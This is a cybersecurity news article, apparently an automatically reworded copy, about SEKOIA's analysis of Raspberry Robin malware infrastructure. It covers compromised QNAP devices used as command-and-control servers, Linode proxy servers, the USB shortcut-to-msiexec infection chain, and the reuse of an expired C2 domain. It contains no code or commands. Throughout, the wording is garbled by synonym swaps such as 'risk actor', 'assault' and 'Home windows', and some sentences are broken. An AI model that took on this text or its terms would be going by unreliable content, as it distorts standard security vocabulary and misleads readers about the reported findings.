February 7, 2023

Jan 11, 2023Ravie LakshmananCyber Menace / Malware

A brand new evaluation of Raspberry Robin’s assault infrastructure has revealed that it is doable for different risk actors to repurpose the infections for their very own malicious actions, making it an much more potent risk.

Raspberry Robin (aka QNAP worm), attributed to a risk actor dubbed DEV-0856, is malware that has more and more come below the radar for being utilized in assaults geared toward finance, authorities, insurance coverage, and telecom entities.

Given its use a number of risk actors to drop a variety of payloads equivalent to SocGholish, Bumblebee, TrueBot, IcedID, and LockBit ransomware, it is suspected to be a pay-per-install (PPI) botnet able to serving next-stage payloads.

Raspberry Robin, notably, employs contaminated USB drives as a propagation mechanism and leverages breached QNAP network-attached storage (NAS) gadgets as first-level command-and-control (C2).

Cybersecurity agency SEKOIA mentioned it was in a position to establish a minimum of eight digital personal servers (VPSs) hosted on Linode that perform as a second C2 layer that possible act as ahead proxies to the following as-yet-unknown tier.

Raspberry Robin
Raspberry Robin

“Every compromised QNAP appears to behave as a validator and forwarder,” the France-based firm mentioned. “If the obtained request is legitimate, it’s redirected to an higher stage of infrastructure.”

The assault chain thus unfolds as follows: When a person inserts the USB drive and launches a Home windows shortcut (.LNK) file, the msiexec utility is launched, which, in flip, downloads the primary obfuscated Raspberry Robin payload from the QNAP occasion.

This reliance on msiexec to ship out HTTP requests to fetch the malware makes it doable to hijack such requests to obtain one other rogue MSI payload both by DNS hijacking assaults or buying beforehand recognized domains after their expiration.

One such area is tiua[.]uk, which was registered within the early days of the marketing campaign in late July 2021 and used as a C2 between September 22, 2021, and November 30, 2022, when it was suspended by the .UK registry.

“By pointing this area to our sinkhole, we had been in a position to get hold of telemetry from one of many first domains utilized by Raspberry Robin operators,” the corporate mentioned, including it noticed a number of victims, indicating “it was nonetheless doable to repurpose a Raspberry Robin area for malicious actions.”

The precise origins of how the primary wave of Raspberry Robin USB infections occurred stay at the moment unknown, though it is suspected that it could have been achieved by counting on different malware to disseminate the worm.

Raspberry Robin

This speculation is evidenced by the presence of a .NET spreader module that is mentioned to be answerable for distributing Raspberry Robin .LNK recordsdata from contaminated hosts to USB drives. These .LNK recordsdata subsequently compromise different machines through the aforementioned methodology.

The event comes days after Google’s Mandiant disclosed that the Russia-linked Turla group reused expired domains related to ANDROMEDA malware to ship reconnaissance and backdoor instruments to targets compromised by the latter in Ukraine.

“Botnets serve a number of functions and may be reused and/or reworked by their operators and even hijacked by different teams over time,” the researcher mentioned.

Discovered this text fascinating? Comply with us on Twitter and LinkedIn to learn extra unique content material we submit.